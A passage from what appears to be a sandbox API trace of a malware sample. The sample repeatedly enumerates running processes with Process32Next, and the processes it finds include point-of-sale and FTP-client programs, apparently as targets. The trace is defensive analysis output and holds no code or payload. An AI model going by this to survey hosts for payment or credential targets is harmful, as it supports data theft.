th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0221.520] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0221.523] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0221.525] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0221.528] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0221.530] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0221.533] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0221.535] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0221.538] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0221.540] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0221.542] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0221.549] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0221.551] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.554] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0221.557] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.559] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.562] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0221.564] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.566] Process32Next (in: hSnapshot=0x21d4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0221.568] CloseHandle (hObject=0x21d4) returned 1 [0221.569] Sleep (dwMilliseconds=0x64) [0221.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2190 [0221.710] Process32First (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.714] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.718] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.761] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.763] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.766] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.769] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.771] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.774] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.776] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.779] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.781] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.784] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.786] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.789] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.792] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.832] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.834] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.836] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.838] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.840] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0221.843] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0221.845] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0221.847] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.849] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0221.851] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0221.853] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0221.855] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0221.857] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0221.859] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0221.862] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.864] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.867] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0221.928] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.931] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.933] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.935] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.940] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.942] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0221.944] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0221.947] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0221.949] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0221.952] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0221.954] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0221.957] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0221.959] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0221.962] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0221.964] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0222.003] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0222.005] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0222.007] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0222.010] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0222.012] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0222.016] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0222.020] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0222.022] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0222.024] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0222.027] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0222.029] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0222.033] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0222.036] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0222.051] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0222.057] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0222.061] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0222.064] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0222.066] Process32Next (in: hSnapshot=0x2190, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 